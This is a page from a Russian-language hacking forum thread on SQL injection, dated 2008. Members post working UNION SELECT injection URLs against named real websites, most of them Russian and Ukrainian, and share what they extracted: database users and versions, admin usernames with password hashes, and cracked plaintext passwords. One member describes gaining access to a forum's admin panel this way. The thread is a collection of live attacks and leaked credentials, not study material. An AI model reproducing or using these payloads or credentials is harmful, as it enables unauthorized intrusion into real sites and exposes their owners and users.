HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 644 из 1602 « Первая < 144544594634 640 641 642 643 644 645 646 647 648 6546947441144 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.09.2008, 20:04
Мистерео
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830

Репутация: 94
По умолчанию
Цитата:
Сообщение от Twoster  
http://www.democracy.ru/print.php?id=-1+union+select+1,2,user(),4,database(),6,7,8,9,10, 11,12,13,14,15/*
Итак приступим.
Версия 5 на серве стоит пошарив по сайту нашел пхпббшный форум так что иньекция была проведена буквально за пару секунд запросом

Код:
http://www.democracy.ru/print.php?id=-1+union+select+1,2,concat_ws(0x3a,username,user_password),4,5,6,7,8,9,10,11,12,13,14,15+from+phpbb_users+limit+1,1/*
Откуда посыпались акки как переспелые мандарины с дерева ))) взял я все три акка которые были в базе и моим уловом стал

Andrey:2c44e4b135929e56f778fadc97077465
Елена Алексеенко:ffae0a5ec97c310be6bb424a35d03 cfc
Kremniov:c4ca4238a0b923820dcc509a6f75849b

Начал проганять хеши через сервисы и только последний был взломан
Kremniov:1
попробовав пробить форум на login.php или admin.php я получил кулаком в лоб ни то ни другое не было найдено в дело пошел сканнер и выдал чтото в виде
Код:
http://www.democracy.ru/admin/
но и тут меня ждало разочарование юзалась примитивная basic аутидентификация ни логин ни пароль от того что имелось не было...

А с форумом меня радости не ждало т.к. логин страница была удалена (и нафига им это хотя у них весь форум в спаме...)

P.S.Также я прошелся по таблицам в поисках чего нибудь вкусного сразу говорю ниче интересного вы там не найдете (150 таблиц всякого мусора )))
 
Ответить с цитированием

  #2  
Старый 06.09.2008, 00:20
login999
Постоянный
Регистрация: 12.06.2008
Сообщений: 654
Провел на форуме:
4512757

Репутация: 973


По умолчанию
Код:
 http://www.mibf.ru/index.php?id=37+union+select+1,id,3,4,5,6,7,8,9,10+from+users/*
-скуля таблицу и одно из полей подобрал, дальше хз, + не вижу, куда выводятся результаты (в теле страницы вроде нет)
Последний раз редактировалось login999; 06.09.2008 в 00:51..
 
Ответить с цитированием

  #3  
Старый 06.09.2008, 01:13
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию
Код:
http://www.fun.te.ua/?news=-1+union+select+11,22,version(),44,user(),database()/*
user: funteua@localhost
database: funteua
version: 5.0.45


запись админа из таблицы users:
Код:
http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,Login,Password+from+users+WHERE+ID=1/*

Там еще форум есть phpbb3. Хэш админа:
Код:
http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,username,user_password+from+forumfun.phpbb3_users+WHERE+user_id=2/*
 
Ответить с цитированием

  #4  
Старый 06.09.2008, 10:30
Мистерео
Познающий
Регистрация: 07.08.2006
Сообщений: 66
Провел на форуме:
2256830

Репутация: 94
По умолчанию
Цитата:
Сообщение от bons  
Там еще форум есть phpbb3. Хэш админа:
Код:
http://www.fun.te.ua/?news=-1+union+select+11,22,33,44,username,user_password+from+forumfun.phpbb3_users+WHERE+user_id=2/*
На форуме валяется два админа
Первый Co1T второй ch@os
хеш кольта пробивкой по мд5 ниче не дало а вот на ch@os'а мне выдало

ch@os:641a668c3d04a7564b278413445808a5
Пробив хеш получилось
ch@os:18121985

Логинимся на форуме выбираем админ панель и вуаля!Мы в админке
 
Ответить с цитированием

  #5  
Старый 07.09.2008, 17:01
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585

Репутация: 441
По умолчанию
Код:
http://www.cm-lousa.pt/servicos/news.php?id=99999+union+select+1,concat_ws(0x40,host,user,password,file_priv,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+mysql.user/*
 
Ответить с цитированием

  #6  
Старый 07.09.2008, 20:39
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию
Код:
http://www.wtopnews.com/index.php?nid=25&sid=1+UNION+SELECT+concat_ws(0x3a,version(),database(),user()),2/*
Цитата:
5.0.32-Debian_7etch5-log:dc_inform:informant@micro3.bonnint.net
Код:
http://www.lam.org/news/article.php?id=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9/*
Цитата:
4.0.26-standard-log:lam:lam@vhosts23.web.gcii.net
 
Ответить с цитированием

  #7  
Старый 06.09.2008, 15:44
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
Провел на форуме:
1777055

Репутация: 347
По умолчанию
Код:
http://www.samara-sv.info/?static=-1'+union+select+111,user(),database(),version(),555,666/*
user - samara@localhost
database - samarasv2_main
version - 5.0.22-log


есть таблица users с двумя записями, вот только неизвестно от чего это

Код:
http://www.samara-sv.info/?static=-1'+union+select+111,login,passw,user_id,555,666+from+users/*

9 turist ec6d9c8953ab272295ec0469bbed59ab (mountain)
11 budym c645ef64e05f5c5c47e4b204a43b3323 (?)
 
Ответить с цитированием

  #8  
Старый 06.09.2008, 20:11
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
По умолчанию
http://www.laterre.ca/?action=lienSousCat&idLienSousCat=116/**/UNION/**/SELECT/**/1,2,concat(user,0x3a,password),4,5,6,7,8,9,30,31,3 2+from+mysql.user+limit+1,1/*

root:717714425d27f95d
 
Ответить с цитированием

  #9  
Старый 07.09.2008, 10:29
USAkid
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766

Репутация: 228
По умолчанию
http://www.spakedr.ru

Код:
http://www.spakedr.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(version(),0x3a,user(),0x3a,database())/*
version() - 4.0.24-standard-log
user() - slavalne_joomla@localhost4.0.24-standard-log
database() - 4.0.24-standard-logslavalne_joomla

Код:
http://www.spakedr.ru/administrator/components/com_astatspro/refer.php?id=-1+union+select+1,2,concat_ws(username,0x3a,password,0x3a,usertype)+from+jos_users/*
- запрос на логин/пасс/статус админа, но чето он отвергается.
 
Ответить с цитированием

  #10  
Старый 07.09.2008, 13:01
..::TROYAN::..
Участник форума
Регистрация: 22.05.2008
Сообщений: 158
Провел на форуме:
2875309

Репутация: 348
По умолчанию
Код:
http://www.maljutka.ru/shop/goods.php?id=9+union+select+1,concat(user(),0x3a,database(),0x3a,version()),null,4,5,6,7/*
Код:
http://www.maljutka.ru/shop/shop.php?id=9999+union+select+1,concat(user(),0x3a,database()),3,4,5,6/*
user - maljut01@fe59-1.hc.ru
database - wwwmaljutkaru
version - 4.1.22
 
Ответить с цитированием
Ответ
Страница 644 из 1602 « Первая < 144544594634 640 641 642 643 644 645 646 647 648 6546947441144 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.